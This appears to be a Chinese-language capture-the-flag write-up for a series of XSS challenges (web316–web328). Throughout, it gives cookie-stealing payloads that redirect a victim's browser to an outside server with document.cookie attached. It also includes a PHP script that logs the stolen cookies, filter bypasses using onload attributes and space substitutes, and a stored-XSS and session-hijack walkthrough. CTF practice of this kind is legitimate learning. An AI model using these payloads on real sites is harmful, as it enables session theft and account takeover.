web316
1.打开是一个这样的页面
可以写下祝福语,既然是xss题目,那么直接xss语句,看看能不能弹窗
<script>alert(1)</script>
发现可以,查看一下他的cookie
<script>alert(document.cookie)</script>
说我不是admin,没有flag
2.开始构造
方法1
可以通过服务器的方式进行外带
<script>location.href="ip"+document.cookie</script>
我这里使用的是python -m http.server 80,python的服务
<script>location.href="http://106.55.49.252/"+document.cookie</script>
然后到达服务器这里看响应
解码完得到flag
方法2
首先在服务器上写一个php文件
<?php $cookie = $_GET['cookie']; $time = date('Y-m-d h:i:s', time()); $log = fopen("cookie.txt", "a"); fwrite($log,$time.': '. $cookie . "\n"); fclose($log); ?>然后访问这个php文件
<script>location.href="http://106.55.49.252/1.php?cookie="+document.cookie</script>
在传入这个,到服务器那里等15秒
3.知识点
这题使用的是一个外带的方法
location.href:获取或设置当前页面URL
题目中用到的
<script>location.href="http://106.55.49.252/"+document.cookie</script>
就相当于在管理员门口装了一个大镜子,当管理员admin,要拿钥匙开门的时候,把钥匙反射到我的屋里了
这个就是让admin的浏览器给服务器发送请求,顺便给我的服务器也发送了请求
web317
1.打开还是那个页面
这题过 滤了script,可以换一个属性
使用body属性
<body οnlοad="location.href='http://106.55.49.252/1.php?cookie'+document.cookie"></body>
然后到服务器查看
url解码得到flag
onload事件是页面加载完成触发
web318
1.上题的payload还能使用
还能使用svg属性
<svg οnlοad="location.href='http://106.55.49.252/1.php?cookie='+document.cookie"></svg>
web319
1.上题的payload还能使用
web320
1.这次上题的不行了
应该是多了过滤
一点一点的删除,看看是哪些过滤了
最后发现是空格被过滤了
绕过空格 ,有 / /**/ 绕过方式
考验对空格的绕过,可以使用 / /**/
一直到326题全部都是这个payload
web327
1.这题变成存储型了
有发件人,收件人 还有信的内容几个功能
那么根据前面题目的思路,这个收件人肯定是admin,然后信的内容就是xss的内容
2.开始构造
收件人admin,发件人任意,然后信的内容为下方的
<script>location.href="http://106.55.49.252/1.php?cookie="+document.cookie</script>
web328
1.打开变成了 登陆页面
登陆admin,弱口令发现不行,看到有个注册功能
不让注册admin
那就随便注册一个
登陆上去,发现用户管理,只有管理员可看,抓包看看,是如何验证身份的
发现是由cookie认证的,那么现在唯一能套取admin用户的cookie的地方,应该是由密码那里可以盗取
那么在注册的时候,将密码设置为盗取admin用户cookie的payload,然后再使用admin的来进行查看用户管理,那么不就成了
2.开始构造
任意注册一个用户,密码为盗取cookie的payload
这里需要加上分号因为前面那些题是纯HTML属性,所以不需要分号,现在这里是JS字符串内,必须加 分号,用来闭合前面的赋值语句并开启新语句
<script>location.href="http://106.55.49.252/1.php?cookie="+document.cookie;</script>
然后登陆完
给进行一个替换,这边就变成admin用户了
但是看不到管理页面,而且这是临时的,我们直接到存储里面修改 cookie,然后刷新一下就能看到flag了
